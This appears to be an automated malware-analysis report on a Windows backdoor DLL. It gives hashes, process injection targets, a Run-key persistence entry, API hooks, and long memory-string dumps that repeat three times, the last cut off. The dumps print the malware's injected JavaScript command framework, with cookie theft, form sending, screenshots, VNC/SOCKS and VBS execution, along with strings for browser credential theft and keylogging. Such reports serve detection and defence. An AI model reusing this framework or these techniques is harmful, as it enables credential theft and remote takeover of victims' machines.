Gen.Variant.Razy.83620_a5f88e0327
Gen:Variant.Razy.83620 (B) (Emsisoft), Gen:Variant.Razy.83620 (AdAware), GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: a5f88e0327ec6c6d070f43b524796ab3
SHA1: bca36ff6666b01f5512177349e3812884faf06ee
SHA256: 64798442a636f0e606281d9c9a7a2ab4c3f2aed2ad1906c557ddc5e142b366a8
SSDeep: 6144:kky4EJcjqsiGZirGLrAjNyPXdVvN72CNW:LyNiis0GkAPX/Vy
Size: 290816 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2006-11-12 16:52:04
Analyzed on: Windows7 SP1 32-bit
Summary:
Backdoor. Malware that enables a remote control of victim's machine.
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
regsvr32.exe:1796
The Backdoor injects its code into the following process(es):
spoolsv.exe:1244
Explorer.EXE:1440
wmiprvse.exe:1468
conhost.exe:1624
TPAutoConnSvc.exe:1676
TPAutoConnect.exe:2160
conhost.exe:2168
SearchIndexer.exe:2228
sppsvc.exe:3244
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process regsvr32.exe:1796 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
C:\ProgramData\LibxaJximb\QamzEsom.ijv (1425 bytes)
Registry activity
The process regsvr32.exe:1796 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"LibxaJximb" = "regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Backdoor installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Backdoor installs the following user-mode hooks in ADVAPI32.dll:
CreateProcessAsUserA
CreateProcessAsUserW
The Backdoor installs the following user-mode hooks in kernel32.dll:
CreateProcessA
CreateProcessW
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: cliconfg.exe
Internal Name: cliconfg.exe
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: SQL Client Configuration Utility EXE
Comments:
Language: Russian (Russia)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 180158 | 180224 | 5.48097 | b59c2046e6af7d252af8df1ec8502f68 |
| .data | 184320 | 12092 | 8192 | 4.45016 | 618c91f77c765d9f3228c3c0b4da2f07 |
| .rdata | 196608 | 74289 | 75776 | 5.39355 | bca71c338bba39b6e0ecc81b66c43569 |
| .rsrc | 274432 | 20560 | 22528 | 3.08036 | caf8808e1cc07e448dcd3d53b2488ad5 |
| .reloc | 299008 | 1094 | 2048 | 1.12464 | 9ddd40658136f95c43bf4ca4de26fddc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Backdoor connects to the servers at the folowing location(s):
spoolsv.exe_1244_rwx_024E0000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
Explorer.EXE_1440_rwx_04100000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
Explorer.EXE_1440_rwx_04620000_00077000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
